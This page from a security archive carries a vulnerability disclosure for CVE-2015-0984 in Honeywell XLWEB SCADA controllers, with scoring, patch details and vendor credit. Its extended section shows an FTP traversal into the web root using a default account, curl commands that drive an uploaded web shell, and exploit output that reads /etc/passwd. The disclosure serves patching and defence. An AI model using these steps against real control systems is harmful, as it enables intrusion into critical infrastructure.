exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Honeywell XLWEB SCADA Path Traversal

Honeywell XLWEB SCADA Path Traversal
Posted Apr 23, 2015
Authored by Martin Jartelius

Honeywell XLWEB SCADA controller suffers from a remote path traversal vulnerability that allows for remote code execution.

tags | exploit, remote, code execution, file inclusion
SHA-256 | ee6a9dd2740fbab23901b5e759ec313b5cebd9ef618a61394f8d8704f2189df1

Honeywell XLWEB SCADA Path Traversal

Change Mirror Download

SCADA - EXPLOITING CVE-2015-0984 FOR SHELL ACCESS

This post is a follow up detailing how to achieve control of the actual
XLWEB SCADA controller. The vulnerability is assigned with reference
CVE-2015-0984.

Rather than the application level administrative access as discussed in
the email regarding CVE-2014-2717, this focuses on issues with the FTP,
default accounts which could not be changed, and high privileges of the
web server user resulting in a simple shell on the server.

In this case we are looking at CVE-2015-0984, or ICSA-15-076-02, but we
expect to be back with a second disclosure soon when the vendor have had
a chance to look at the latest finding, still pending a CVE, if one will
be assigned.

For those interested in a more readable version of this disclosure and
additional information, see
https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/

Please note that the CVE at NVD uses a different CVSS vector than the
one in this disclosure or from ICS-CERT, stating partial confidentiality
and no availability or integrity impact. As this gives shell access to
the system, I am relatively certain the C:C/A:C/I:C is the correct
evaluation.



_________________________

*BACKGROUND*

Honeywell is a US-based company that maintains offices worldwide.

The affected products, XLWeb controllers, are web-based SCADA systems.
According to Honeywell, XLWeb controllers are deployed across several
sectors including Critical Manufacturing, Energy, Water and Waste water
Systems, and others. Honeywell estimates that these products are used
primarily in Europe and the Middle East.



_________________________

*VULNERABILITY OVERVIEW*

The vulnerability is defined as a PATH TRAVERSAL. By using a directory
traversal vulnerability in the FTP server, it is possible to gain access
to the web root directory.

A CVSS v2 base score of 10.0 has been assigned; the CVSS vector string
is (AV:N/AC:L/Au:N/C:C/I:C/A:C)

That is;
Access Vector – Network

Access Complexity – Low

Authentication – None <--- Built in account used to target the system

Complete impact to availability, integrity and confidentiality.

Note that NVD uses an incorrect scoring which lists integrity and
availability as unaffected, and confidentiality as partial.



_________________________

*MITIGATION*

The update for this vulnerability is Excel Web Linux version 2.04.01
(March, 2014) or later plus the programming tool CARE version 10.02
(March 2014) or later. Customers are encouraged to contact their local
Honeywell HBS branch to have their sites updated to the latest version.

In the Centraline partner channel, Excel Web controllers also have been
sold under the brand name “FALCON.” Centraline partners can directly
access http://www.centraline.com and get these versions.

Linux:
https://www.centraline.com/index.php?id=847&route=article/index&directory_id=140&direct_link=1

CARE:
https://www.centraline.com/index.php?id=847&route=article/index&directory_id=138&direct_link=1



_________________________

*EXTENDED DISCLOSURE*

The system has an account for localization and customization of parts of
the interfaces. The account is available in numerous guides as found
online, account name is XWADMIN.

This account has access to the FTP server, and is also available for
login via TELNET if present. The XWADMIN user is also the user executing
the web-server on the platform.

The platform uses a version of PHP with some vendor modifications, of
importance to an attacker however is that the server support all the
basic functionality one would need from a simple web-shell such as the
exec and passthru functions.

FTP (Windows command line)

FTP honeydemo.internal
Connected to honeydemo.internal.
220- ###################################################
220- # #
220- # Welcome to the embedded ftp server #
220- # #
220- ###################################################
220 xlweb FTP server (GNU inetutils 1.3b) ready.
User (honeydemo.internal:(none)): xwadmin
331 Password required for xwadmin.
Password:
230 User xwadmin logged in.
ftp> cd ../../mnt/mtd6/xlweb/web
250 CWD command successful.



After uploading the shell, we can interact with the server. I like to
keep it simple
curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=whoami”
Response: xwadmin

curl “http://honeydemo.internal/ws.php?code=[secret_string]&cmd=id”
Response: uid=501(xwadmin) gid=101(xwadmin)



And, since we all like a nice wrapper to do our work for us:

python code\HoneyWell\CVE-2015-0984.PY
Starting analysis
Attempting connection via FTP to target vulnerability CVE-2015-0984...
Connected to target, with authenticated access
Using traversal vulnerability to get a shell
Uploading shell...
Shell uploaded, connecting...
Shell open, running commands as xwadmin

EXIT to quit
CMD >> whoami
xwadmin

CMD >> cat ../../../../etc/passwd
root:x:0:0:Super-User:/root:/bin/sh
xwadmin:x:501:101:ExcelWeb-Administrator:/home/xwadmin:/bin/sh
modem:x:502:102:Modem-User:/dev/null:/bin/false
uucp:x:503:103:Unix-to-Unix CoPy system:/dev/null:/bin/false
sshd:x:65535:65534:SSH-Deamon:/dev/null:/bin/false
xwtrend:x:504:504:ftp-user:/tmp/xwtrend

CMD >> EXIT
Running cleanup, deleting shell and closing connections...
Done, connection closed



As patch penetration currently is close to 0 among the internet facing
systems, and only very few have patched the critical risk from 2014, we
will not be releasing the script-kiddie friendly tools for neither
CVE-2014-2717 nor CVE-2015-0984, but the information here should be
sufficient to demonstrate the implications of the issue and the need to
apply patches.



_________________________

*FURTHER READING
*Blog:
https://www.outpost24.com/hacking-industrial-control-systems-case-study-falcon/
NVD: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0984
ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-15-076-02
Outpost24 website: https://www.outpost24.com/

As mentioned in the lead in, other issues were found during
documentation for this advisory, leading to shell access even on fully
patched systems, and the devices should be isolated from public
networks. Just as the vendor recommends.



_________________________

*FINAL WORDS
*Many thanks to Honeywell. During a year of research in the field, only
3 vendors have reacted responsibly and remediated reported issues
associated with SCADA systems. Honeywell have done it the fastest, and
most efficient. This is why they appear in this disclosure – they have
remediated and fixed the critical risk, and we hope other vendors will
assume the same responsibility.



--
Best Regards,
------------------------------------------------------------------------------------------
Martin Jartelius
CSO
Outpost24 AB
Bastionsgatan 6A | 371 32 Karlskrona | Sweden
E: mj () outpost24 com W: www.outpost24.com <http://www.outpost24.com/>
Outpost24 - Vulnerability Management Made Easy!


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close